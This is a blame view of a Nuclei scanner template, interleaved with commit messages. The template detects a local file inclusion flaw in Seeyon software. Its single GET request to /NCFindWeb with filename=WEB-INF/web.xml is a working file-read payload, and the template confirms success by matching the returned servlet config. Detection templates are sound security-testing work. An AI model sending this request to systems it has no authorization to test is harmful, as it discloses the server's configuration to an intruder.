daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml

35 lines
962 B
YAML
Raw Normal View History

Renames vulnerabilities/other/WooYun2015-148227 (#3488) Swaps capitalization to all lowercase, as Linux filesystems don't handle capitalization well which may result in this file being skipped.
2022-01-06 06:30:31 +00:00
id: wooyun-2015-148227
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
info:
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements
2022-08-05 13:57:51 +00:00
name: Seeyon WooYun - Local File Inclusion
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
author: princechaddha
severity: high
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements
2022-08-05 13:57:51 +00:00
description: Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements
2022-08-05 13:57:51 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
classify eyou, seeyon, tonged, weaver, dedecms, yonyou (#4557) * Auto Generated CVE annotations [Sun May 15 12:16:57 UTC 2022] :robot: * Auto Generated CVE annotations [Mon Jun 6 03:02:54 UTC 2022] :robot: * create tongda directory and put templates in * create weaver directory and put templates in * create seeyon directory and put templates in * create yonyou directory and put templates in * create dedecms directory and put templates in * create eyou directory and put templates in * misc update Co-authored-by: GitHub Action <action@github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-06-08 08:01:29 +00:00
tags: seeyon,wooyun,lfi,zhiyuan
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 1
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>NCInvokerServlet</servlet-name>"
part: body
- type: word
part: header
words:
- "application/xml"